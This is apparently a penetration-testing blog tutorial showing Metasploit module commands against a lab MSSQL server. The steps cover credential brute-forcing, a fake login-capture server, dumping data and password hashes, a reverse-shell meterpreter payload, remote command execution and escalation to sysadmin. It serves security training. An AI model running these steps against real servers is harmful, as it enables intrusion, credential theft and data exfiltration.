Penetration Testing

MSSQL for Pentester: Metasploit

In this article, we will learn in detail how to pentest MSSQL servers using the Metasploit framework.

Table of content

  • Introduction
  • Information Gathering & Enumeration
    • Locating MSSQL Server
    • Password Cracking
    • Retrieving MSSQL version
    • MSSQL Enumeration
    • SQL Users Enumeration
    • Capturing MSSQL login
    • Creating Database
    • Dumping Database
    • SchemaDump
    • Hashdump
  • Command Exceution
    • Xp_cmdshell
    • MSSQl_exec
    • CLR Assembely
  • Privilege Escalation
    • Public to Sysadmin
    • Impersonation

Introduction

Metasploit is an excellent framework developed by H. D. Moore. It is a free and lightweight tool for penetration testing. It is open-source and cross-platform and has a range of features. Its popularity rests primarily on the fact that it is a powerful tool for auditing security. While this is true, it also has many features that can help people protect themselves. Personally speaking, this is my go-to tool for testing as it encapsulates the exploit a pentester can ever need. Through this article, we will learn how to use Metasploit to exploit MSSQL. Therefore, we will go through every exploit Metasploit has to offer step by step, from finding the MSSQL server in the network to retrieving the sensitive information from the database and gaining control. Without any further ado, let us begin.

Information Gathering & Enumeration

Locating MSSQL Server

When testing MSSQL servers, whether remotely or locally, our first requirement is to find the server in the network. And for this, we will use the following exploit in Metasploit:

use auxiliary/scanner/mssql/mssql_ping
set rhosts 192.168.1.1/24
exploit

Password Cracking

We have found the server, so our next step is to retrieve the credentials of the server. We will enforce a dictionary attack for this, with the help of the following exploit:

use auxiliary/scanner/mssql/mssql_login
set rhosts 192.168.1.3
set user_file /root/users.txt
set verbose false
exploit

And you can see in the image above, we have the credentials.

Retrieving MSSQL version

We can also get all the information about the MSSQL server and its version with the help of the following exploit:

use auxiliary/admin/mssql/mssql_sql
set rhosts 192.168.1.3
set username lowprwiv
set password Password@1
exploit

MSSQL Enumeration

Let’s now enumerate the server and see what all information we can get. And for this, we will use the following exploit:

use auxiliary/admin/mssql/mssql_enum
set rhosts 192.168.1.3
set username lowpriv
set password Password@1
exploit

As the result of the above exploit, you can see what permissions are given to the database, which logins are available with other helpful information. The same can be seen in the image above.

SQL Users Enumeration

We can also find the proper login list of all the users on the server. Metasploit provides us with a particular exploit for just this task. And the exploit is the following:

use auxiliary/admin/mssql/mssql_enum_sql_login
set rhosts 192.168.1.3
set username lowpriv
set password Password@1
exploit

And as a result, you can see in the above image that the list of all users will be provided to you.

Capturing MSSQL login

The next exploit that we are going to use capture/mssql. This exploit creates a fake server and tries to capture the authenticated credentials from the original server. To use this exploit, type;

use auxiliary/server/capture/mssql
set srvhost 192.168.1.2
exploit

Now, if the user tries to log in to the server, for instance, we will have the credentials with the following command:

sqsh -S 192.168.1.2 -U sa -P "password@1"

And when you check your Metasploit, voila! You will have the correct login credentials of the server, which you can see in the image below as well:

Creating Database

Usually, any MSSQL server that you are pentesting will have a database. But as the server on which we are performing this penetration testing is new as we also wanted to show the lab setup; therefore, for our next exploit to work, we will be creating a database in our server. To make the database, use the following command:

create database bank;

As the above query execute itself successfully, our next step is to type in the following query:

CREATE TABLE Customers (
    CustomerID int,
    LastName varchar(255),
    FirstName varchar(255),
    passw varchar(255),
    creditcard varchar(255)
);

And so, as you can see in the image above, our table is created. Now, let’s add data to our table with the help of the following query:

INSERT INTO Customers(CustomerID, LastName, FirstName, passw, creditcard)
VALUES ('01', 'Technologies','Ignite', 'admin123', '1111-2222-3333-4444');

INSERT INTO Customers(CustomerID, LastName, FirstName, passw, creditcard)
VALUES ('02', 'Sharma','Nisha', 'admin1234', '5555-6666-7777-8888');

INSERT INTO Customers(CustomerID, LastName, FirstName, passw, creditcard)
VALUES ('03', 'Chandel','Raj', 'admin12345', '9999-1010-1020-1030');

INSERT INTO Customers(CustomerID, LastName, FirstName, passw, creditcard)
VALUES ('04', 'Madan','Geet', 'admin12311', '1234-5678-9012-3456');

This way, you can create your database.

Dumping Database

Now that we have our database, let us learn how we can dump the content of the database with the help of Metasploit. Luckily, Metasploit has a particular exploit dedicated to dumping the content of the database. And to use the said exploit type:

use auxiliary/admin/mssql/mssql_findandsampledata
set rhosts 192.168.1.3
set username lowpriv
set password Password@1
set sample_size 4
set keywords FirstName|passw|credit
exploit

Thus, using the above exploit will give the desired content of the database. For instance, the data we dumped had the information of the stored credit cards of the users.

SchemaDump

The next exploit that we are going to use will dumb the schema of the server. And to use this exploit, use the following set of commands:

use auxiliary/scanner/mssql/mssql_schemadump
set rhosts 192.168.1.3
set username lowpriv
set password Password@1
exploit

And so, with the help of the above exploit, we have the data from the server.

Hashdump

Last but not least, our next exploit is used to dump the hashes of the users from the server. To use this exploit, type:

use auxiliary/scanner/mssql/mssql_hashdump
set rhosts 192.168.1.149
set username sa
set password Password@1
expoit

Command Exceution

Xp_cmdshell

We found the MSSQL server in the network, retrieved the credentials, impersonated the user to have higher privileges. So now, let us try and get a meterpreter session of the server by exploit xp_cmdshell by using the following exploit:

use exploit/windows/mssql/mssql_payload
set rhosts 192.168.1.3
set username lowpriv
set password Password@1
exploit

As you can see in the above image, the exploit is trying to enable the xp_cmdshell to have our session. We have written a detailed article on xp_cmdshell, which you can read here. Once the xp_cmdshel is successfully enabled, we will have our meterpreter session as shown in the image below:

MSSQl_exec

Now, if we want to execute a command on the server, we can do that remotely with the help of Metasploit’s following exploit:

use auxiliary/admin/mssql/mssql_exec
set rhosts 192.168.1.3
set username lowpriv
set password Password@1
set cmd "net user"
exploit

And as you can see in the image above, the exploit is executed successfully, and we have our desired result, i.e., the list of all the net users.

Another method to execute the desired command is to first write the command in .sql file with the following command:

cat user.sql
CREATE LOGIN test1 WITH PASSWORD = 'Password@1';

 Now we can use this .sql to run on the server, remotely, with the help of the following exploit:

use auxiliary/admin/mssql/mssql_sql_file
set rhosts 192.168.1.3
set username lowpriv
set password Password@1
set sql_file /root/user.sql
exploit

And as a result, the above exploit will create a user with the name of test1. You can manually go to the server and confirm the creation of the user as shown in the image below:

CLR Assembely

The next exploit will help to take advantage of the CLR integration. This exploit will enable CLR integration, and along with that, it will also activate the trustworthy database property. After the exploit gives you the session, it restores all the settings to their original form. To use this exploit, type:

use exploit/windows/mssql/mssql_clr_payload
set payload windows/x64/meterpreter/reverse_tcp
set username lowpriv
set password Password@1
exploit

And as you can see, the exploit followed all the steps to exploit CLR integration to our potential. And it gives out the meterpreter session as shown in the image above.

Privilege Escalation

Public to Sysadmin

Now that we have the user’s credentials, we can use the following exploit escalate privileges for our user. This exploit will manipulate the trustworthy property of the database and give you all the privileges you desire. And for this, we will use the following exploit:

use auxiliary/admin/mssql/mssql_escalate_dbowner
set rhosts 192.168.1.3
set username lowpriv
set password Password@1
exploit

Note: To deeply understand the working of this exploit, read our other article here.

As you can see above, we got sysadmin privileges for our user.

Impersonation

Another method to gain privileges is by impersonating another user. And the following exploit will help us do precisely that; it will let our user impersonate other users to gain sysadmin privilege. To use this exploit, use the following set of commands:

use auxiliary/admin/mssql/mssql_escalate_execute_as
set rhosts 192.168.1.3
set username lowpriv
set password Password@1
exploit

Now, as you can see in the image above, the lowpriv user can impersonate sa user. Sa user is a member of sysadmin, and with the help of the above exploit, lowpriv is now a sysadmin too, as it impersonated sa user.

All in all, Metasploit is one of the best tools to pentest MSSQL servers as it offers so many exploits and multiple ways to do so.

Author: Yashika Dhir is a Cyber Security Researcher, Penetration Tester, Red Teamer, Purple Team enthusiast. Contact her on Linkedin and Twitter